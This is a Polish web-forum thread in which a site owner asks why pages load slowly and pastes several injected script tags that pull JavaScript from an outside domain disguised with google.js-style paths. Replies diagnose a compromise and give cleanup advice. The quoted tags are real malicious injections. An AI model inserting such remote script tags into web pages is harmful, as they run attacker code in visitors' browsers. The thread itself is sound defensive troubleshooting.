Zawirusowana strona?

0

Zauważyłem, że strona dłużej się wczytuje lub praktycznie ciągle jest w stanie wczytywania, w dodatku pewne elementy, które wymagały JS nie działają. Po podejrzeniu kodu za pomocą narzędzi dev zobaczyłem, że są jakieś dziwne skrypty, których wcześniej nie było.

<script src="//lib.tongjii.us/tongji.js"></script>
<script src="http://lib.tongjii.us/tj.js?//google.js?41d12a21b4e1a726d4a651685b118811662033874"></script>
<script src="http://lib.tongjii.us/tj.js?//google.js?41d12a21b4e1a726d4a651685b118811662033874"></script>
<script src="http://lib.tongjii.us/tj.js?//google.js?41d12a21b4e1a726d4a651685b118811662033874"></script>
<script src="http://lib.tongjii.us/tj.js?//google.js?41d12a21b4e1a726d4a651685b118811662033874"></script>

Wszedłem na te stony i widzę dziwny, nieznany mi kod. Co to jest, wirus?

0

Tak. Ktoś go umieścił za pomocą np. XSS (luka w twojej aplikacji) albo uzyskał bezpośredni dostęp do plików twojego serwisu (najprawdopodobniej przez komputer kogoś z dostępem do tych plików).

0

A ja tam obstawiam trojana i wykradnięcie haseł do FTP z Twojego komputera (bo użyłeś opcji "zapamiętaj hasło" w programie do FTP).

0

Cholera w takim razie jak się tego pozbyć?

2

Przeskanować komputer antywirusami, anty spyware i co tylko znajdziesz, znaleźć niezainfekowaną kopię strony i wgrać ją od nowa (szukanie po całym kodzie tych wstawek będzie trudne - takie wirusy potrafią się doklejać do js, do php, do html, czasem i do css-ów (dziś już nie, bo mało kto korzysta ze starych IE obsługujących expression), używają losowych domen, zaciemniania kodu i innych sztuczek.

Kiedy już wszystko masz czyste - zmień hasło do FTP. Nie używaj nigdy opcji "zapamiętaj hasło" (zapisz sobie na karce i przyklej do monitora - będzie 100x bezpieczniej). Wszyscy, co mieli dostęp do strony też niech przeskanują komputery i pozmieniają wszelkie hasła.

Jeżeli strona jest na jakimś CMS-ie to go zaktualizuj (wordpress regularnie ma łatki na swoje dziury), jeżeli to dzieło własne, to przeanalizuj czy nie masz dziur (porada dnia: jak się na tym nie znasz BARDZO to zleć to komuś).

0

Ok, zobaczymy co będzie.

0

Ale czy w kodzie strony to się znalazło? Jeżeli jest w magiczny sposób doklejane, to sprawdź na innym komputerze. Ja miałem przyjemność obcowania z jednym z adwerów, który uszczęśliwiał mnie doklejaniem skryptów do każdej strony którą przeglądałem. Nie miało to nic wspólnego z aplikacją przy której pracowałem (ufff zrobiło mi się wtedy gorąco)

0

Przykładowy raport z zawirusowanej strony http://urlquery.net/report.php?id=1436744870134

0

na wejście spróbuj skanerów online stron internetowych może wykryją i pokażą ci złośliwy kod

1 użytkowników online, w tym zalogowanych: 0, gości: 1